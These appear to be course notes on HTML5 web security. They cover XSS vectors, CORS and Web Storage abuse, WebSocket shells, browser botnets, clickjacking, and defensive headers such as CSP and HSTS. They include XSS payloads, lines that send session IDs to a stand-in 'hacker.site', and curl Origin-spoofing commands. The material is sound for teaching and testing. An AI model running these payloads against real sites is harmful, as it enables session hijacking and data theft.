HTLM5

Intro

We do not need to analyze the entire HTML5 RFC and its related features; However, what we are going to explore in this Recap section is the major features that are interesting from a security perspective.

Semantics

Enrichment of the semantics that web devs can give to their apps. These include new media elements, form types, attributes, and many others. From security point of view, these become new attack vectors and ways to bypass security measures.

Form Elements

The keygen element is one of the new Form Elements. It was introduced to generate a key-pair client side. The most interesting attribute it supports is autofocus. This is useful in triggering XSS without user interaction.

Example:

<form action="#" method "GET">
  Encryption: <keygen name="security" autofocus onfocus="alert(1);">
  <input type="submit">
</form>

Media Elements

# Both <video> and <audio> are commonly ysed to evade XSS filters. In addition, <source>, <track> and <embed> are also useful due to the fact that they support the 'src' attribute

# Example:

<embed src="http://hacker.site/evil.swf">
<embed src="javascript:alert(1)">

Semantic / Structural Elements

There are many other elements introduced to improve the semantic and the structure of a page, such as:

<article>
<figure>
<footer>
<header>
<main>
<mark>
<nav>
<progress>
<section>
<summary>
<time>

All of them support Global and Event Attributes, both old and new.

Attributes

There is a huge list of new events and some interesting examples are:

onhashchange
onformchange
onscroll
onresize
...

Example:

<body onhashchange="alert(1)">
  <a href="#"> Click me</a>

Offile & Storage

A real world example is TiddlyWiki: http://tiddlywiki.com/

  • Some of the major features, related to this evolution are Application Cache and Web Storage (alias Client-Side Storage or Offile storage)

Web Storage – Attack Scenarios

The attack scenarios may vary from Session Hijacking, User Tracking, Disclosure of Confidential Data, as well as a new way to store attack vectors.

Session Hijacking

If a dev chooses to store session IDs by using sessionStorage instead of cookies, its still possible to perform session hijacking by leveraging an XSS flaw.

new Image().src="http://hacker.site/SID?"+escape(sessionStorage.getItem('sessionID'));
// usually was document.cookie

Web storage solutions do not implement security mechanisms to mitigate the risk of malicious access to the stored information (see HttpOnly)

Offline Web Application – Attack Scenarios

  • With Offline Web apps, the most critical security issue is Cache Poisoning.
  • The offile apps can also cache SSL-resources and the root directory of a website.

Device Access

A feature introduced by the HTML5 specs is Geolocation API

→ http://www.w3.org/TR/geolocation-API/

This is a way to provide scripted access to identify a users positions based on GPS coordinates (lat and long)

Geolocation – Attack Scenarios

This API access can not only be used For user tracking, physical and cross-domain, but also For breaking anonymity.

Fullscreen Mode – Attack Scenario

Another API that allows a single element (images, videos, etc) to be viewed in full-screnn mode.

→ https://dvcs.w3.org/hg/fullscreen/raw-file/tip/Overview.html

  • This API can be used For Phishing Attacks.
  • Example, sending a phishing page in full screen mode and loading a fake victim website in the background with a image that simulates the browser header, adress bar, etc.

Performance, Integration & Connectivity

Many new features such as:

  • Drag and Drop, HML editing and Workers( Web and Shared) Improvements are also made on communications, with features such as:
  • WebSocket and XMLHttpRequest2.

Attack Scenarios

Interactive XSS, with Drag and Drop, to Remove Shell, port scanning and web-based botnets exploiting the new communication features like WebSocket.

  • Its also possible to manipulate the history stack with methods to add and remove locations, thus allowing history tampering attacks.

Sec POV, the most important features introduced are:

Content Security Policy
Cross-Origin Resource Sharing
Cross-Document Messaging 
strengthening of iframe with the Sandboxed attribute.

- http://www.w3.org/TR/CSP/
- http://www.w3.org/TR/cors/
- https://html.spec.whatwg.org/multipage/web-messaging.html
- http://www.w3.org/TR/html5/embedded-content-0.html#attr-iframe-sandbox

Exploiting HTML5

Which may affect the most widespread technologies introduced by HTML5

CORS Attack Scenarios

The same origin restrictions began to become more restrictive rather than helpful. In order to relax the SOP, a new specification has been introduced called: Cross-Origin Resource Sharing.

→ http://www.w3.org/TR/cors/

It uses a set of HTTP headers.

→ http://www.w3.org/TR/cors/#syntax

These allow both server and browser to communicate in relation to which requests are or not allowed.

Universal Allow

The first CORS headers is Access-Control-Allow-Origin, which indicates whether a resource can be shared or not.

This is based upon it returning the value of the Origin request header, *, or null in the response:

Access-Control-Allow-Origin = "Access-Control-Allow-Origin" ":" origin-list-or-null | "*"

Allow by Wildcar Value *

Generally this is not a required behavior, but rather a matter of laziness of the implementer. This is one of the most common misconfigurations with CORS headers.

How to abuse?

- If XSS is found on the page served with 'Access-Control-Allow-Origin *', it can be used to infect or impersonate users.
- Tricking users to access a controlled website and making a COR query to their internal resources in order to read the responses.
- Use the users as a proxy to exploit vulnerabilities, therefore leveraging the fact that the HTTP Referrer header is often not logged.

Universal Allow

In CORS, the Access-Control-Allow-Credentials indicates that the request can include user credentials. http://www.w3.org/TR/cors/#user-credentials

Allow by Server-side

Allowing COR from all domains with credentials included:

<?php
header('Access-Control-Allow-Origin: '+$_SERVER['HTTP_ORIGIN']);
header('Access-Control-Allow-Credentials: true');

By design, this implementation allows CSRF.

Any origin will be able to read the anti-CSRF tokens from the page, therefore consenting any domain on the internet to impersonate the web application users.

Weak Access Control

CORS specifications provide a request header named Origin. It indicates where the COR or Preflight Request originates from.

  • The header can be spoofed by creating requests outside of the browsers. For example, one can use a proxy or using tool like cURL, Wget, etc.

Check Origin Example

Suppose that a victim.site supports CORS and, not only reveals sensitive information to friendly origins, but also reveals simple information to everyone.

By using CURL its possible to bypass the access control by setting the Origin header to the allowed value: friend.site.

In so doing, its possible to read the sensitive information sent:

curl http://victim.site/html5/CORAaccessContro.php
# normal output

curl --header 'Origin: http://hacker.site' http://victim.site/...
# normal output

curl --header 'Origin: http://friend.site' http://victim.site/...
# sensitive information found

Intranet Scanning

Its also possible to abuse COR in order to perform time-based intranet scanning.

  • Send XHR to either an arbritrary IP address or domain names and, depending on the response time, establish wheter a host is up or a specific port is open.

JS-Recon

Its a HTML5 based Javascript Network Reconnaissance tool

→ https://web.archive.org/web/20120313125925/http:/www.andlabs.org/tools/jsrecon/jsrecon.html

Which features like COR and Web Sockets in order to perform both network and port scanning from the browser.

Also useful to guessing users private IP addresses.

Remote Web Shell

If an XSS flaw is found in an app that supports CORS, an attacker can hijack the victim session, establishing a communication channel between the victims browser and the attcker.

The Shell of the Future

→ https://web.archive.org/web/20150223205517/http:/www.andlabs.org/tools/sotf/sotf.html

Its a Reverse Web Shell handler, it can be used to hijack sessions where JavaScript can be inject using XSS or through the browsers address bar. It makes use of HTML5 Cross Origin Requests and can bypass anti-session hijacking measures like Http-Only cookies and IP address-Session ID binding…

Storage Attacks Scenarios

→ https://tools.ietf.org/html/rfc6265#section-6.1

Web Storage

Its the first stable HTML5 specification that rules two well known mechanisms: Session Storage and Local Storage.

The implementations are similar to cookies and they are also known as key-value storage and DOM storage. Anything can be converted to a string or serialized and stored:

window.(localStorage|sessionStorage).setItem('name','Joao');
#         DOM properties                       Key     Value
  • http://www.w3.org/TR/webstorage/#security-storage

The main issue with this technology is that developers are not aware of the security concerns presented in this specification, which clearly reports the security risks this feature may introduce.

Session Hijacking

In the case of an XSS attack, Web Storage is a property of the Window object; therefore, its accessible via the DOM and, in a similar fashion to cookies, it can be compromised.

The exploitation is similar to the one used For cookies, but the only difference is in the API used to retrieve the values:

<script> new Image.src = "http://hacker.site/C.php?cc=" +escape(sessionStorage.getItem('sessionID'));
</script>
  • HTTP cookies have attributes, such as HTTPOnly, that were introduced to stop the session hijacking phenomena.
  • This security measure, however, is completely missing For WebStorage technologies, making it completely inappropriate For storing both session identifiers and sensitive information

Cross-Directory Attacks

Another important difference is that, unlike HTTP cookies, there is no feature to restrict the access by pathname, making the Web Storage content available in the whole origin. This may also introduce Cross-Directory attacks.

  • This is typical For various social networks like facebook, or universities.

Example:

  • If a XSS flaw is found in the university path uni.edu/~professorX, its possible to read all stored data in all the directories available in the university domain uni.edu.

Using Tracking and Confidential Data Disclosure

Its possible to perform User Traking if websites use Web Storage objects to store information about users behaviors rather than HTTP Cookies.

IndexedDB

When working with structured data, it does not provide an efficient mechanism to search over values.

To address these limitations, two options that HTML5 introduced:

- IndexedDB - http://www.w3.org/TR/IndexedDB/
- Web SQL Databse - http://www.w3.org/TR/webdatabase/
// the second was deprectated in 2010
  • webSQL database is a relational database access system, whereas IndexedDB is an indexed table system.
  • Indexed Database API is an HTML5 API introduced For high performance searches on client-side storage. The idea is that this storage would hold significantamounts of structured, indexed data, thereby giving developers an efficient client-side querying mechanism.
  • Its a transactional technology, however, not relational. The database system saves key-value pairs in object stores and allows searching data by using indexes also known as keys.

  • The primary risks are related to information leakage and information spoofing
  • IndexedDB follows the Same-Origin Policy but limits the use to HTTP and HTTPS in all browser except Internet Explorer.

This also allows ms-wwa and ms-wwa-web protocols For their apps in the new Windows UI format.

Web Messaging Attack Scenarios

→ http://www.w3.org/TR/webmessaging/

This is also referred as Cross Document Messaging or postMessage (API name)

Communications between the embedded iframes and the hosting website are now possible.

DOM XSS

This occurs if the postMessage data received is used without validation. Such as innerHTML, write, etc:

...
// Say Hello
var hello = document.getElementById("hellobox");
hello.innerHTML = "Hello "+e.data;
// HTMLElement Sink           User controlled values

Origin Issue

The Web Messaging Protocl allows the presence of the Origin header field

The Origin header is not mandatory, but it can help reduce the attack surface by both limiting the interaction with trusted origins and reducing the likelihood of a Client-side DoS:

if (e.origin != 'http://trusted.site'){
// Origin not allowed
return;
}

As we have seen with CORS, even if it cannot be done via browser, the origin header can be spoofed by creating requests outside the browser.

Web Sockets Attack Scenarios

→ http://tools.ietf.org/html/rfc6455

→ http://www.w3.org/TR/websockets/

HTML5 Web Sockets can provide a 500:1 or –depending on the size of the HTTP headers - even a 1000:1 reduction in unnecessary HTTP header traffic and 3:1 reduction in latency.

That is not just an incremental improvement; that is a revolutionary jump.

If we are able to execute JavaScript code inside the victim browser, its possible to establish a Web Socket connection and perform our malicious operations.

Data validation

One of the simplest data validation issues to find may be XSS and while looking For it, we might also find other types of Injections concerning both client-side and server-side.

MiTM

WebSocket Protocol standard defines two schemes For web socket connections:

xs  = unencrypted
xss = encrypted

If the implementation uses the unencrypted channel, we have a MiTM issue whereby, anybody on the network can see and manipulate the traffic.

Remote Shell

If we are able to execute JavaScript code on the victim browser, by either exploiting an XSS flaw or tricking the victim into visiting a malicious website, we could conveniently establish a full Web Socket connection and, as a result, have a Remote Shell active until the window/tab is closed.

Network Reconnaissance

Nice tools to test both scenarios JS-Recon

→ https://web.archive.org/web/20120313125925/http:/www.andlabs.org/tools/jsrecon/jsrecon.html

Web Workers Attack Scenarios

→ http://www.w3.org/TR/workers/

Web workers is the solution, introduced by HTML5, to allow thread-like operations within web browsers. it allows most modern browser to run Javascript in the background.

Methods like setTimeout, setInterval or even XMLHttpRequest, provided a valid solution to achieving parallelism by using thread-like messaging.

Two types:

Dedicated Web Workers: http://www.w3.org/TR/workers/#dedicated-workers-and-the-worker-interface
Shared Web Workers: http://www.w3.org/TR/workers/#shared-workers-and-the-sharedworker-interface
  • A dedicated workers can only be accessed through the script that created it, while the shared one can be accessed by any script from the same domain.
  • It did not introduce new threats, but increased the performance and feasibility of the attack.

Browser-Based Botnet

We can run the Javascript code on all the browsers that support the features the bot uses. This also includes any OS that can run a browser, even on televisions, gaming console, etc.

Two stages:

- 1. Infect the victims: XSS, email spam, social engineering...
- 2. Manage Persistence: the malicious code will work until the victim browser is closed.

Sometimes, implementing a game can help u keep the victim on the malicious page. If the game is both interactive and especially addictive, the user may remain online the entire day.

With an HTML5 Botnet, some of the possibel attacks that can be performed are:

Email Spam
Distributed Password Cracking
DDoS Attacks
Phishing
Data Mining
Intranet Reconnaissance

Distributed Password Cracking

  • Ravan

→ http://web.archive.org/web/20160315031218/http:/www.andlabs.org/tools/ravan.html

A system based on WebWorkers to perform password cracking of MD5, SHA1, SHA256, SHA512 hashes.

WebWorkers + CORS - DDoS Attacks

Adding CORS we could generate a large number of GET/POST requests to a remote website. We would be using COR requests to perform a DDoS attack.

  • We dont care if the response is blocked or wrong, we care about sending as many requests as possible.

To bypass the CORS limitation, add facke parameters in the query-string. It will force the browser to transform each request, therefore identifying it as unique:

http://victim.site/dossable.php?search=X
x = use random values here

Security Measures

Security Headers: X-XSS-Protection

To protect against Reflected XSS attacks

Security Headers: X-Frame-Options

Prevent Clickjacking

  • This header introduced a way For the server to instruct the browser on wheter to display the transmitted content in frame of other web pages.

Syntax:

X-Frame-Options: value

# DENY = the page cannot be displayed in a frame, regardless of the site attempting to do so.
# SAMEORIGIN = The page can only be displayed in a frame on the same origin as the page itself.
# ALLOW-FROM URI = The page can only be displayed in a frame on the specific origin.

Security Headers: Strict-Transport-Security (HSTS)

→ http://tools.ietf.org/html/rfc6797

It allows a server to declare itself accessible only via secure connections. It also allows For users to be able to direct their user agents to interact with given sites over secure connections only.

To enable this mechanism, the response header Strict-Transport-Security is required. (its not supported by all vendors.

→ http://caniuse.com/#feat=stricttransportsecurity

Syntax:

Strict-Transport-Security: max-age=<delta-seconds>; includeSubDomains

# One year in cache is 'max-age=31536000' (Optional)
# While to remove or 'not cache' is max-age=0

Security Headers: X-Content-Type-Options

To indicate a specific resource, web server use the response header Content-Type which contains a standard MIME type( text/html, image/png, etc) with some optional parameters (character set)

→ attack scenarios - http://blog.fox-it.com/2012/05/08/mime-sniffing-feature-or-vulnerability/

The most common is Content Sniffing XSS

→ http://www.adambarth.com/papers/2009/barth-caballero-song.pdf

  • This header instructs the browser to not guess the content type of the resource and trust of the Content-Type header.

Syntax:

X-Content-Type-Options: nosniff
// only works on IE and Chrome

Security Headers: Content Security Policy (CSP)

Its a defende mechanism that can significantly reduce the risk impact of a broad class of content injection vulnerabilities. These include XSS and UI Redressing in modern browsers.

Headers adopted:

X-Content-Security-Policy and X-WebKit-CSP

CSP uses a collection of directives in order to define a specific set of whitelisted sources of trusted content

→ http://www.w3.org/TR/CSP/#directives

The most common is script-src = http://www.w3.org/TR/CSP/#script-src:

 Content-Security-Policy: script-src 'self' https://other.web.site

//                   Directive Name      Values
// 1 Defines which scripts the protected resource can execute
// 2 the allowed sources of scripts

Directives work in default-allow mode. This simply means that if a specific directive does not have a policy defined, then its equal to ‘*’; thus, every source is a valid source.

The default-src directive will be applied to all the unspecified directives:

Content-Security-Policy: default-src 'self'

With CSP, its also possible to deny resources. For example, if the web app does not need plugins or to be framed, then the policy can be enriched as follow:

Content-Security-Policy: default-src https://my.web.site;
object-src 'none'; frame-src 'none'
// 'none' returns an empty set For the allowed sources

CSP specification: http://www.w3.org/TR/CSP/

Defines the following list directives:

default-src
script-src
object-src
style-src
img-src
media-src
frame-src
font-src
connect-src
report-uri // reporting feature
sandbox    // optional

There are four keywords that are also allowed:

none - no sources
self - current origin, but not its subdomains
unsafe-inline - allows inline JavaScript and CSS
unsafe-eval - allows text-to-JavaScript sinks like 'eval, alert, setTimeout...'

// These keywords must be used with single-quotes, otherwise they refer to server named none, self, etc

Report violations mechanism:

Content-Security-Policy: default-src 'self'; report-uri /csp_report;
// once a violation is detected, the browser will perform a POST request to the path specified, sending a JSON object, similar to the one on the next slide.

Example:

{
  "csp-report": {
    "document-uri":"http://my.web.site/page.html",
    "referrer":"http://hacker.site/",
    "blocked-uri":"https://hacker.site/xss_test.js",
    "violated-directive":"script-src 'self'",
    "original-policy":"script-src 'self'; report-uri http://my.web.site/csp_report"
  }
}

CSP Playground

To test CSP options

http://www.cspplayground.com/

UI Redressing - The x-Jacking Art

A category of attacks that aim to change visual elements in a user interface in order to conceal malicious activities.

Example such as:

- Overlaying a visible button with an invisible one
- Changing the cursos position 
- Manipulating other elements in the user interface
- Also known as ClickJacking, LikeJacking, StrokeJacking, FileJacking and others

ClickJacking

This attack uses a nested iframe from a target website and a little bit of CSS magic.

A submission button or whatever the attack chooses to trigger an action:

For example: **find willie**, when clicked it triggers the attack

LikeJacking

→ http://nakedsecurity.sophos.com/2010/05/31/facebook-likejacking-worm/

  • The target are social networks and their features.
  • THe likes are perceived as popularity and quality nowadays, so there is ways to buy likes to give the public this wrong perception

StrokeJacking

→ http://seclists.org/fulldisclosure/2010/Mar/232

A technique to hijack keystrokes, is proof that UI Redressing is not only all about hijacking clicks.

Example:

http://blog.andlabs.org/2010/04/stroke-triggered-xss-and-strokejacking_06.html

New Attack Vectors in HTML5

Drag-and-Drop:

  • With html5 this drag-and-drop mechanims has been transformed into something natively supported by all desktop-based browsers.

Text Field Injection

The first technique allows the attacker-controller to drag data into hidden text fields/forms on different origins.

→ http://blog.kotowicz.net/2011/03/exploiting-unexploitable-xss-with.html

Content Extraction

Allow us to extract content from areas we cannot access. (restricted areas). In this scenario, we must trick the victim into dragging their private data into areas under our control.

  • In order to trick the victim so we can extract content from the targeted web page, we must know what to extract and where it is located.

If the secret is part of a URL, is an HTML anchor element or an image, dragging is easy. Cause the elements will be converted into a serialized URL.

  • Its difficult when the content is not draggable like textual content. So we need to trick the victim to select first before dragging.

We could use the view-source: to load the HTML source code into an iframe.

Example:

<iframe src="view-source:http://victim.site/secretInfo/"></iframe>

however, this technique only works on Firefox, without the NoScript add-on.